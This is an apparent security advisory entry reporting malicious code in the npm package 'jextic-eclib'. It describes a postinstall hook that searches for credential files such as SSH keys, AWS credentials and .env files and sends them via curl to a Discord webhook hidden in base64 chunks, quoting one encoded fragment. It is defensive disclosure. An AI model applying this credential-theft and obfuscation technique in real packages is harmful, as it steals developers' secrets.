Vulnerability
Malicious code in jextic-eclib (npm)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (13a6476409b9cb9296b7f778be375081c8ad12b030658351092e9fef90f4b707) On `npm install`, the package's postinstall hook (`postinstall.js`) requires `index.js`, whose top-level `scanAndExfiltrate()` call walks the installer's working directory and parent directories for sensitive files (.env,.aws/credentials,.ssh/id_rsa,.npmrc,.netrc,.git-credentials, service-account.json, and similar) and POSTs their contents via `execSync('curl...')` to a hardcoded Discord webhook. The webhook URL is split into two base64-encoded chunks (`aHR0cHM6Ly9kaXNjb3JkLmNvbS9hcGkvd2ViaG9va3Mv` plus a base64-encoded webhook ID/token) and reassembled at runtime to evade simple string scanners. The combination of installer-secret enumeration, hardcoded attacker-controlled exfil endpoint, base64 obfuscation, and unconditional execution under the postinstall lifecycle hook is a textbook supply-chain credential-theft attack.
No CVSS base score from NVD or GHSA yet. NVD typically scores within 24–72 hours of publication; GHSA usually within a day for OSS-flagged CVEs. Last record update .
For interim severity, fall back on KEV / EXPLOIT signals and the EPSS percentile (lower panel). Re-check this CVE after one cron tick — the score lands automatically when the source publishes.
FIRST.org publishes EPSS daily. Coverage isn't universal — pre-disclosure CVEs and reserved IDs don't carry an EPSS score until at least one exploitation signal lands. Score will appear within 24 hours of the next EPSS pull.
No exploitation, limited impact or prevalence